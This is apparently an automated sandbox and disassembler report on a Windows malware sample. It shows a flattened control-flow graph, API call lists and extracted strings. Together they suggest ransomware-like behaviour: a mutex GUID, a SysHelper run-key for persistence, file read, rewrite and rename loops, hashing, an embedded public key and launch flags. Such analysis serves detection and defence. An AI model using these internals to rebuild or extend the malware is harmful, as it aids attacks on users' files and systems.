LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39690->39692 39693 4722d3 39691->39693 39695 4722df 39691->39695 39692->39691 39693->39409 39694 472353 39694->39409 39695->39694 39696 4722f0 OpenProcess 39695->39696 39697 472346 CloseHandle 39696->39697 39698 47230a K32EnumProcessModules 39696->39698 39697->39694 39697->39696 39698->39697 39699 47231c K32GetModuleBaseNameW 39698->39699 40046 480235 39699->40046 39701 47233e 39701->39697 39702 472345 39701->39702 39702->39697 39704 480c62 _malloc 58 API calls 39703->39704 39707 46ef6e _memset 39704->39707 39705 46efdc 39705->39415 39706 480c62 _malloc 58 API calls 39706->39707 39707->39705 39707->39706 39709 473f05 39708->39709 39715 473eae 39708->39715 39710 473fb1 39709->39710 39711 473f18 39709->39711 39712 4af23e 59 API calls 39710->39712 39713 473f2d 39711->39713 39714 473fbb 39711->39714 39721 473f3d ___check_float_string 39711->39721 39712->39714 39717 476760 59 API calls 39713->39717 39713->39721 39716 4af23e 59 API calls 39714->39716 39715->39709 39719 473ed4 39715->39719 39718 473fc5 39716->39718 39717->39721 39720 473ff0 59 API calls 39718->39720 39722 473eef 39719->39722 39723 473ed9 39719->39723 39724 473fdf 39720->39724 39721->39415 40059 473da0 59 API calls ___check_float_string 39722->40059 40058 473da0 59 API calls ___check_float_string 39723->40058 39724->39415 39727 473eff 39727->39415 39728 473ee9 39728->39415 39730 46d27d CoInitializeSecurity 39729->39730 39736 46d276 39729->39736 39731 474690 59 API calls 39730->39731 39732 46d2b8 CoCreateInstance 39731->39732 39733 46d2e3 VariantInit VariantInit VariantInit VariantInit 39732->39733 39734 46da3c CoUninitialize 39732->39734 39735 46d38e VariantClear VariantClear VariantClear VariantClear 39733->39735 39734->39736 39737 46d3e2 39735->39737 39738 46d3cc CoUninitialize 39735->39738 39736->39456 40060 46b140 39737->40060 39738->39736 39741 46d3f6 40065 46b1d0 39741->40065 39743 46d422 39744 46d426 CoUninitialize 39743->39744 39745 46d43c 
39743->39745 39744->39736 39746 46b140 60 API calls 39745->39746 39748 46d449 39746->39748 39749 46b1d0 SysFreeString 39748->39749 39750 46d471 39749->39750 39751 46d496 CoUninitialize 39750->39751 39753 46d4ac 39750->39753 39751->39736 39754 46b140 60 API calls 39753->39754 39796 46d8cf 39753->39796 39755 46d4d5 39754->39755 39756 46b1d0 SysFreeString 39755->39756 39757 46d4fd 39756->39757 39758 46b140 60 API calls 39757->39758 39757->39796 39759 46d5ae 39758->39759 39760 46b1d0 SysFreeString 39759->39760 39761 46d5d6 39760->39761 39762 46b140 60 API calls 39761->39762 39761->39796 39763 46d679 39762->39763 39764 46b1d0 SysFreeString 39763->39764 39765 46d6a1 39764->39765 39766 46b140 60 API calls 39765->39766 39765->39796 39767 46d6b6 39766->39767 39768 46b1d0 SysFreeString 39767->39768 39769 46d6de 39768->39769 39770 46b140 60 API calls 39769->39770 39769->39796 39771 46d707 39770->39771 39772 46b1d0 SysFreeString 39771->39772 39773 46d72f 39772->39773 39774 46b140 60 API calls 39773->39774 39773->39796 39775 46d744 39774->39775 39776 46b1d0 SysFreeString 39775->39776 39777 46d76c 39776->39777 39777->39796 40069 483aaf GetSystemTimeAsFileTime 39777->40069 39779 46d77d 40071 483551 39779->40071 39784 472c40 59 API calls 39785 46d7b5 39784->39785 39786 472900 60 API calls 39785->39786 39787 46d7c3 39786->39787 39788 46b140 60 API calls 39787->39788 39789 46d7db 39788->39789 39790 46b1d0 SysFreeString 39789->39790 39791 46d7ff 39790->39791 39792 46b140 60 API calls 39791->39792 39791->39796 39793 46d8a3 39792->39793 39794 46b1d0 SysFreeString 39793->39794 39795 46d8cb 39794->39795 39795->39796 39797 46b140 60 API calls 39795->39797 39796->39734 39798 46d8ea 39797->39798 39799 46b1d0 SysFreeString 39798->39799 39800 46d912 39799->39800 39800->39796 40079 46b400 SysAllocString 39800->40079 39802 46d936 VariantInit VariantInit 39803 46b140 60 API calls 39802->39803 39804 46d985 39803->39804 39805 46b1d0 SysFreeString 39804->39805 39806 46d9e7 VariantClear VariantClear 
VariantClear 39805->39806 39807 46da46 CoUninitialize 39806->39807 39808 46da10 39806->39808 39807->39736 40083 48052a 78 API calls swprintf 39808->40083 40234 46e670 39811->40234 39813 473ea0 59 API calls 39815 46e7c3 39813->39815 39814 46e79e 39814->39813 39816 473ff0 59 API calls 39815->39816 39817 46e7ff 39816->39817 40260 46e870 39817->40260 39819 46e806 39820 473ff0 59 API calls 39819->39820 39821 46e80d 39819->39821 39820->39821 39821->39473 40512 473c40 39822->40512 39824 47288c WideCharToMultiByte 40522 4784e0 39824->40522 39826 4728cf 39826->39478 39828 47102b CryptCreateHash 39827->39828 39829 47101a 39827->39829 39831 471056 lstrlenA CryptHashData 39828->39831 39832 471045 39828->39832 40538 490eca RaiseException 39829->40538 39834 47107f CryptGetHashParam 39831->39834 39835 47106e 39831->39835 40539 490eca RaiseException 39832->40539 39837 47109f 39834->39837 39839 4710b0 _memset 39834->39839 40540 490eca RaiseException 39835->40540 40541 490eca RaiseException 39837->40541 39840 4710cf CryptGetHashParam 39839->39840 39841 4710f5 39840->39841 39842 4710e4 39840->39842 39844 480c62 _malloc 58 API calls 39841->39844 40542 490eca RaiseException 39842->40542 39845 471105 _memset 39844->39845 39846 471148 39845->39846 39847 4804a6 _sprintf 83 API calls 39845->39847 39848 47114e CryptDestroyHash CryptReleaseContext 39846->39848 39849 471133 lstrcatA 39847->39849 39848->39480 39849->39845 39849->39846 39851 473a90 59 API calls 39850->39851 39852 47294c MultiByteToWideChar 39851->39852 39853 478400 59 API calls 39852->39853 39854 47298d 39853->39854 39854->39499 39856 4735d6 39855->39856 39857 473591 39855->39857 39861 4735b7 39856->39861 40544 474f70 59 API calls 39856->40544 39857->39856 39859 473597 39857->39859 39859->39861 40543 474f70 59 API calls 39859->40543 39861->39518 39863 472dec 39862->39863 39864 472dfa 39862->39864 39865 473ea0 59 API calls 39863->39865 39867 473ea0 59 API calls 39864->39867 39866 472df5 39865->39866 39866->39574 39868 472e11 
39867->39868 39868->39574 39870 472c71 39869->39870 39871 472c5f 39869->39871 39874 4756d0 59 API calls 39870->39874 39872 4756d0 59 API calls 39871->39872 39873 472c6a 39872->39873 39873->39579 39875 472c8a 39874->39875 39875->39579 39877 473ff0 59 API calls 39876->39877 39878 472c13 39877->39878 39879 46ecb0 39878->39879 39880 46ece5 39879->39880 39882 46eefc 39880->39882 40545 481b3b 59 API calls 3 library calls 39880->40545 39882->39605 39883 4756d0 59 API calls 39884 46ed6b _memmove 39883->39884 39884->39882 39884->39883 39885 475230 59 API calls 39884->39885 40546 481b3b 59 API calls 3 library calls 39884->40546 39885->39884 39888 4736e7 39887->39888 39889 473742 39887->39889 39888->39889 39890 4736ed 39888->39890 39893 47370d 39889->39893 40548 474f70 59 API calls 39889->40548 39890->39893 40547 474f70 59 API calls 39890->40547 39892 47377f 39896 46ca70 39892->39896 39893->39892 39895 474690 59 API calls 39893->39895 39895->39892 39897 46caa3 39896->39897 39901 46cb64 39896->39901 39898 46cb6b 39897->39898 39897->39901 39902 4736c0 59 API calls 39897->39902 40549 4af26c 59 API calls 3 library calls 39898->40549 39900 46cb75 39900->39587 39901->39587 39902->39897 39904 474690 59 API calls 39903->39904 39905 4730d4 39904->39905 39906 46c740 39905->39906 40550 480fdd 39906->40550 39909 46c944 CreateDirectoryW 39911 480fdd 115 API calls 39909->39911 39912 46c960 39911->39912 39920 46c96a 39912->39920 39926 46c9d5 39912->39926 40574 4828fd 82 API calls 4 library calls 39912->40574 39913 46c90e 39913->39909 39913->39920 39914 46c906 40573 483a38 83 API calls 4 library calls 39914->40573 39918 46c9ed 40576 4828fd 82 API calls 4 library calls 39918->40576 39919 480546 58 API calls 39929 46c79e _memmove 39919->39929 39920->39593 39923 46c9f8 40577 483a38 83 API calls 4 library calls 39923->40577 39924 475c10 59 API calls 39924->39929 40575 4828fd 82 API calls 4 library calls 39926->40575 39927 46c9fe 39927->39920 39928 474f70 59 API calls 39928->39929 39929->39914 
39929->39919 39929->39924 39929->39928 40560 481101 39929->40560 39931 471223 GetFileSizeEx 39930->39931 39932 471287 39930->39932 39933 471234 39931->39933 39934 4712a3 VirtualAlloc 39931->39934 39932->39596 39933->39934 39936 47123c CloseHandle 39933->39936 39935 47131a CloseHandle 39934->39935 39941 4712c0 _memset 39934->39941 39935->39596 39937 473100 59 API calls 39936->39937 39938 471253 39937->39938 40972 4759d0 39938->40972 39940 4713a7 39942 4713b7 SetFilePointer 39940->39942 39941->39940 39944 4712e9 SetFilePointerEx 39941->39944 39945 4713f5 ReadFile 39942->39945 40010 4715ae 39942->40010 39943 47126a MoveFileW 39943->39932 39946 471332 ReadFile 39944->39946 39947 47130c VirtualFree 39944->39947 39948 47140f VirtualFree CloseHandle 39945->39948 39953 471440 39945->39953 39946->39947 39949 47134f 39946->39949 39947->39935 39951 47142f 39948->39951 39949->39947 39952 471356 39949->39952 39950 4715c5 SetFilePointerEx 39950->39948 39954 4715df 39950->39954 39951->39596 39952->39942 39959 472c40 59 API calls 39952->39959 39955 471471 lstrlenA 39953->39955 39956 471718 lstrlenA 39953->39956 39953->40010 39957 4715ed WriteFile 39954->39957 39961 471602 39954->39961 40998 480be4 39955->40998 41050 480be4 39956->41050 39957->39948 39957->39961 39964 471364 39959->39964 39962 4730b0 59 API calls 39961->39962 39966 471631 39962->39966 39964->39940 39975 471379 VirtualFree CloseHandle 39964->39975 39969 472840 60 API calls 39966->39969 39972 47163c WriteFile 39969->39972 39977 471658 39972->39977 39978 471396 39975->39978 39977->39948 39980 471660 lstrlenA WriteFile 39977->39980 39978->39596 39980->39948 39982 471686 CloseHandle 39980->39982 39983 473100 59 API calls 39982->39983 39984 4716a3 39983->39984 39985 4759d0 59 API calls 39984->39985 39987 4716be MoveFileW 39985->39987 39989 4716e4 VirtualFree 39987->39989 39993 4718a7 39987->39993 39994 4716fc 39989->39994 39997 4718d5 VirtualFree 39993->39997 39998 4718e3 39993->39998 39994->39596 39997->39998 
39998->39932 40001 4718e8 CloseHandle 39998->40001 40001->39932 40010->39950 40015->39599 40017 47babb ShowWindow UpdateWindow 40016->40017 40018 47bab9 40016->40018 40017->39601 40018->39601 40022 470a81 40019->40022 40020 4756d0 59 API calls 40020->40022 40021 470bb4 40021->39606 40022->40020 40022->40021 40023 473ea0 59 API calls 40022->40023 40026 473ff0 59 API calls 40022->40026 40027 472900 60 API calls 40022->40027 40028 473580 59 API calls 40022->40028 40024 470ae0 SetErrorMode PathFileExistsA SetErrorMode 40023->40024 40024->40022 40025 470b0c GetDriveTypeA 40024->40025 40025->40022 40026->40022 40027->40022 40028->40022 40029->39632 41139 47f130 timeGetTime 40029->41139 40030->39612 41344 47fd80 40030->41344 40031->39387 40032->39423 40034 471af4 40033->40034 40035 471ad0 40033->40035 40034->39432 40036 471afc 40035->40036 40037 471adc DispatchMessageW PeekMessageW 40035->40037 40036->39432 40037->40034 40037->40035 40038->39433 40039->39572 40040->39605 40041->39669 40042->39671 40044->39687 40045->39687 40047 480241 40046->40047 40048 4802b6 40046->40048 40050 485208 _fputws 58 API calls 40047->40050 40054 480266 40047->40054 40057 4802c8 60 API calls 3 library calls 40048->40057 40052 48024d 40050->40052 40051 4802c3 40051->39701 40056 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40052->40056 40054->39701 40055 480258 40055->39701 40056->40055 40057->40051 40058->39728 40059->39727 40061 483b4c 59 API calls 40060->40061 40062 46b164 40061->40062 40063 46b177 SysAllocString 40062->40063 40064 46b194 40062->40064 40063->40064 40064->39741 40066 46b1de 40065->40066 40068 46b202 40065->40068 40067 46b1f5 SysFreeString 40066->40067 40066->40068 40067->40068 40068->39743 40070 483add __aulldiv 40069->40070 40070->39779 40084 49035d 40071->40084 40073 48355a 40074 46d78f 40073->40074 40092 483576 40073->40092 40076 4828e0 40074->40076 40187 48279f 40076->40187 40080 46b423 40079->40080 40081 46b41d 40079->40081 40082 46b42d VariantClear 40080->40082 
40081->39802 40082->39802 40083->39796 40085 48501f __getptd_noexit 58 API calls 40084->40085 40086 490363 40085->40086 40087 490369 40086->40087 40088 49038d 40086->40088 40090 488cde __malloc_crt 58 API calls 40086->40090 40087->40088 40089 485208 _fputws 58 API calls 40087->40089 40088->40073 40091 49036e 40089->40091 40090->40087 40091->40073 40093 4835a9 _memset 40092->40093 40094 483591 40092->40094 40093->40094 40101 4835c0 40093->40101 40095 485208 _fputws 58 API calls 40094->40095 40096 483596 40095->40096 40133 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40096->40133 40098 4835cb 40100 485208 _fputws 58 API calls 40098->40100 40099 4835e9 40125 48fb64 40099->40125 40124 4835a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 40100->40124 40101->40098 40101->40099 40103 4835ee 40134 48f803 58 API calls _fputws 40103->40134 40105 4835f7 40106 4837e5 40105->40106 40135 48f82d 58 API calls _fputws 40105->40135 40148 4842fd 8 API calls 2 library calls 40106->40148 40109 483609 40109->40106 40136 48f857 40109->40136 40110 4837ef 40112 48361b 40112->40106 40113 483624 40112->40113 40114 48369b 40113->40114 40116 483637 40113->40116 40146 48f939 58 API calls 4 library calls 40114->40146 40143 48f939 58 API calls 4 library calls 40116->40143 40117 4836a2 40117->40124 40147 48fbb4 58 API calls 4 library calls 40117->40147 40120 48364f 40120->40124 40144 48fbb4 58 API calls 4 library calls 40120->40144 40122 483668 40122->40124 40145 48f939 58 API calls 4 library calls 40122->40145 40124->40074 40126 48fb70 _fputws 40125->40126 40127 488af7 __lock 58 API calls 40126->40127 40128 48fba5 _fputws 40126->40128 40129 48fb80 40127->40129 40128->40103 40130 48fb93 40129->40130 40149 48fe47 40129->40149 40178 48fbab LeaveCriticalSection _doexit 40130->40178 40133->40124 40134->40105 40135->40109 40137 48f861 40136->40137 40138 48f876 40136->40138 40139 485208 _fputws 58 API calls 40137->40139 40138->40112 40140 48f866 40139->40140 40186 4842d2 9 API calls 
__invalid_parameter_noinfo_noreturn 40140->40186 40142 48f871 40142->40112 40143->40120 40144->40122 40145->40124 40146->40117 40147->40124 40148->40110 40150 48fe53 _fputws 40149->40150 40151 488af7 __lock 58 API calls 40150->40151 40152 48fe71 _W_expandtime 40151->40152 40153 48f857 __tzset_nolock 58 API calls 40152->40153 40154 48fe86 40153->40154 40177 48ff25 __tzset_nolock 40154->40177 40179 48f803 58 API calls _fputws 40154->40179 40157 48fe98 40157->40177 40180 48f82d 58 API calls _fputws 40157->40180 40158 48ff71 GetTimeZoneInformation 40158->40177 40159 480bed _free 58 API calls 40159->40177 40161 48feaa 40161->40177 40181 493f99 58 API calls 2 library calls 40161->40181 40163 48ffd8 WideCharToMultiByte 40163->40177 40164 48feb8 40182 4a1667 78 API calls 3 library calls 40164->40182 40165 490010 WideCharToMultiByte 40165->40177 40168 48ff0c _strlen 40170 488cde __malloc_crt 58 API calls 40168->40170 40169 49ff8e 58 API calls __tzset_nolock 40169->40177 40173 48ff1a _strlen 40170->40173 40171 48fed9 type_info::operator== 40171->40168 40172 480bed _free 58 API calls 40171->40172 40171->40177 40172->40168 40173->40177 40183 48c0fd 58 API calls _fputws 40173->40183 40175 483c2d 61 API calls UnDecorator::getTemplateArgumentList 40175->40177 40176 490157 __tzset_nolock _fputws 40176->40130 40177->40158 40177->40159 40177->40163 40177->40165 40177->40169 40177->40175 40177->40176 40184 4842fd 8 API calls 2 library calls 40177->40184 40185 4900d7 LeaveCriticalSection _doexit 40177->40185 40178->40128 40179->40157 40180->40161 40181->40164 40182->40171 40183->40177 40184->40177 40185->40177 40186->40142 40214 48019c 40187->40214 40190 4827d4 40191 485208 _fputws 58 API calls 40190->40191 40192 4827d9 40191->40192 40222 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40192->40222 40193 4827e9 MultiByteToWideChar 40195 482804 GetLastError 40193->40195 40196 482815 40193->40196 40223 4851e7 58 API calls 3 library calls 40195->40223 40198 488cde __malloc_crt 58 
API calls 40196->40198 40200 48281d 40198->40200 40199 482810 40203 480bed _free 58 API calls 40199->40203 40200->40199 40202 482825 MultiByteToWideChar 40200->40202 40201 46d7a3 40201->39784 40202->40195 40204 48283f 40202->40204 40205 4828a0 40203->40205 40206 488cde __malloc_crt 58 API calls 40204->40206 40207 480bed _free 58 API calls 40205->40207 40208 48284a 40206->40208 40207->40201 40208->40199 40224 48d51e 88 API calls 3 library calls 40208->40224 40210 482866 40210->40199 40211 48286f WideCharToMultiByte 40210->40211 40211->40199 40212 48288b GetLastError 40211->40212 40225 4851e7 58 API calls 3 library calls 40212->40225 40215 4801ad 40214->40215 40216 4801fa 40214->40216 40226 485007 40215->40226 40216->40190 40216->40193 40218 4801b3 40219 4801da 40218->40219 40231 4845dc 58 API calls 6 library calls 40218->40231 40219->40216 40232 48495e 58 API calls 6 library calls 40219->40232 40222->40201 40223->40199 40224->40210 40225->40199 40227 48501f __getptd_noexit 58 API calls 40226->40227 40228 48500d 40227->40228 40230 48501a 40228->40230 40233 487c2e 58 API calls 3 library calls 40228->40233 40230->40218 40231->40219 40232->40216 40235 480c62 _malloc 58 API calls 40234->40235 40236 46e684 40235->40236 40237 480c62 _malloc 58 API calls 40236->40237 40238 46e690 40237->40238 40239 46e6b4 GetAdaptersInfo 40238->40239 40240 46e699 40238->40240 40242 46e6c4 40239->40242 40243 46e6db GetAdaptersInfo 40239->40243 40241 481f2d _wprintf 85 API calls 40240->40241 40246 46e6a3 40241->40246 40247 480bed _free 58 API calls 40242->40247 40244 46e741 40243->40244 40245 46e6ea 40243->40245 40250 480bed _free 58 API calls 40244->40250 40284 4804a6 40245->40284 40249 480bed _free 58 API calls 40246->40249 40251 46e6ca 40247->40251 40253 46e6a9 40249->40253 40254 46e74a 40250->40254 40255 480c62 _malloc 58 API calls 40251->40255 40253->39814 40254->39814 40257 46e6d2 40255->40257 40257->40240 40257->40243 40258 46e737 40259 481f2d _wprintf 85 API calls 40258->40259 
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046CF10: _memset.LIBCMT ref: 0046CF4A
                                                                                                                              • Part of subcall function 0046CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0046CF5F
                                                                                                                              • Part of subcall function 0046CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0046CFA6
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00479FC4
                                                                                                                            • GetLastError.KERNEL32 ref: 00479FD2
                                                                                                                            • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00479FDA
                                                                                                                            • GetLastError.KERNEL32 ref: 00479FE4
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00A3B7F8,?), ref: 0047A0BB
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047A0C2
                                                                                                                            • GetCommandLineW.KERNEL32(?,?), ref: 0047A161
                                                                                                                              • Part of subcall function 004724E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004724FE
                                                                                                                              • Part of subcall function 004724E0: GetLastError.KERNEL32 ref: 00472509
                                                                                                                              • Part of subcall function 004724E0: CloseHandle.KERNEL32 ref: 0047251C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                            • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1V$list<T> too long$x*V$x2W${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7V
                                                                                                                            • API String ID: 2957410896-2125747970
                                                                                                                            • Opcode ID: b19d47b218fba90ababaab0ef5b708722d7ec817f6fad7e5e0a517157c8f4a8b
                                                                                                                            • Instruction ID: 48c03d4a3856c862ba0d6869a8837064167bef53de054655856ab1d5f035bafb
                                                                                                                            • Opcode Fuzzy Hash: b19d47b218fba90ababaab0ef5b708722d7ec817f6fad7e5e0a517157c8f4a8b
                                                                                                                            • Instruction Fuzzy Hash: EDD2E470504341ABD724EF25C845BDF7BE4BF91308F00891EF48987292EB799A19DB9B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 004E1983
                                                                                                                            • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 004E1994
                                                                                                                            • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004E19A1
                                                                                                                            • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004E19AE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004E19E8
                                                                                                                            • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004E19FB
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 004E1A2D
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 004E1A81
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1AC5
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 004E1ADB
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 004E1AEE
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004E1B01
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1C15
                                                                                                                            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004E1C36
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 004E1C50
                                                                                                                            • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 004E1C63
                                                                                                                            • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 004E1C76
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1D45
                                                                                                                            • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004E1D73
                                                                                                                            • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 004E1D86
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32First), ref: 004E1D99
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32Next), ref: 004E1DAC
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 004E1DBF
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 004E1DD2
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32First), ref: 004E1DE5
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32Next), ref: 004E1DF8
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32First), ref: 004E1E0B
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32Next), ref: 004E1E1E
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32First), ref: 004E1E31
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32Next), ref: 004E1E44
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 004E1EDD
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E1F03
                                                                                                                            • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 004E1F1A
                                                                                                                            • Heap32First.KERNEL32(00000024,?,?), ref: 004E1F95
                                                                                                                            • Heap32Next.KERNEL32(?,?,?,?,?,7D14E1D3), ref: 004E1FE3
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E1FF1
                                                                                                                            • Heap32ListNext.KERNEL32(?,?), ref: 004E2058
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2066
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2095
                                                                                                                            • Process32First.KERNEL32(?,00000128), ref: 004E20AA
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E20FB
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2118
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2187
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E21A4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                            • API String ID: 4174345323-1723836103
                                                                                                                            • Opcode ID: 2df9f7bd7bec59fbb9d45209e0490751fe08a4938b328f85146e29752404d8f9
                                                                                                                            • Instruction ID: cbd03a992584a4f3ec5e08c4616c2292859e86f30c5eface954cf06a3af9bf4d
                                                                                                                            • Opcode Fuzzy Hash: 2df9f7bd7bec59fbb9d45209e0490751fe08a4938b328f85146e29752404d8f9
                                                                                                                            • Instruction Fuzzy Hash: 8A3282B0E402699ADB209F65CC45B9FBA79FF45705F0041EBA60CE3291EB748E84CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,?,0052B3EC,000000FF), ref: 0047E6C0
                                                                                                                              • Part of subcall function 0046C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0047E6D4), ref: 0046C6C2
                                                                                                                              • Part of subcall function 0046C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0046C6F3
                                                                                                                              • Part of subcall function 0046C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0046C700
                                                                                                                            • _memset.LIBCMT ref: 0047E707
